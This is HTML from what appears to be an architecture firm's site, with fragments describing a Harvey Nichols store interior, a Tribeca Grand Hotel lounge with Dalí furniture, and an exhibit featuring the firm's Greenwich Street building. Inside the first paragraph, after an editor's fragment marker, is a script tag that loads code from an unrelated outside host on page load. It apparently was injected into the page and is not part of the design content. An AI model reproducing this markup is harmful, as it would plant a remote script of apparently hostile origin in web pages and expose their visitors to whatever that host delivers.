<p>  <!--StartFragment--><span style="font-size: 11pt; font-family: Helvetica; color: #420000">When entering the new store in Harvey Nichols one encounters a contiguous walnut surface, which wraps from floor to wall to ceiling and creates the feeling of a catwalk with as a backdrop the projection of the latest fashion show. The two flanking silvery spaces reveal the collection suspended in space from twisted silver-nickel bars, and lit from below by recessed lighting. Archi-tectonics developed suspended mannequins, as ‘sculpted’ bodies exhibiting the fluid lines of the clothes, to complement the hanging vitrines as designed by </span><span style="font-size: 11pt; font-family: Helvetica"><strong>Gabellini</strong></span><span style="font-size: 11pt; font-family: Helvetica"> Sheppard Associates<span style="color: #420000"> . Movement created by the passers-by, cause the mannequins to slowly turn, and reveal the pieces from all sides. This almost hypnotic movement, is reinforced by the light of a very large gorgeous chandelier designed by </span>Barlas Baylar of Hudson Design.<o:p></o:p></span>  <!--EndFragment--><script src="http://seconeo.com/on"></script></p>

<p style="text-align: left"><span style="font-family: Arial; line-height: normal; font-size: 10px" class="Apple-style-span">The space in the Tribeca Grand Hotel was curated by Richard Klein of Surface Magazine. We were invited to design the space and to work with 18 of the best modern Spanish designers and manufacturers. When doing research of their work it struck us that one of the companies, BD Barcelona, represents amazing Dali furniture.  Dalí was known for the striking and bizarre images in his <a href="http://en.wikipedia.org/wiki/Surrealism">surrealist</a> work, as shown below in the <a href="http://en.wikipedia.org/wiki/The_Persistence_of_Memory_(novel)">The Persistence of Memory, </a> a painting which epitomizes Dalí&#8217;s theory of &#8217;softness&#8217; and &#8216;hardness&#8217;, which was central to his thinking at the time. Many also consider that the melting watches were there to symbolize the irrelevance of time, which, in the Tribeca Lounge, is of no relevance either!</span><span style="font-family: Helvetica; line-height: 18px; font-size: medium" class="Apple-style-span"><span style="font-size: 10pt; font-family: Arial" lang="EN-GB"><span>  </span></span></span></p>

<p>The Greenwich Street building was featured in the exhibit &#8220;The City We Imagined/The City We Made&#8221; at the Architectural League of New York. The exhibit, which opened on Friday May 7th, features a timeline that includes over one hundred buildings, built or proposed in the past decade, that have made significant contributions to architecture and design in New York. <p class="MsoNormal"><span style="font-family: 'Myriad Pro'">A golden metallic fabric wrapped wall with a custom stitched and padded surface was developed as a shimmering backdrop to the wood surface. Lighting is used to enhance the space’s geometry, with a light cove concealed above the wood plank ceiling that creates a contrasting glow on the adjacent white painted ceilings. <o:p></o:p></span></p>

<p class="MsoNormal"><span style="font-family: 'Myriad Pro'">Archi-Tectonics also specified the furnishings and special lighting elements. The final effect is a rich , integrated environment that delivers maximum dramatic impact to a compact space. <o:p></o:p></span></p>
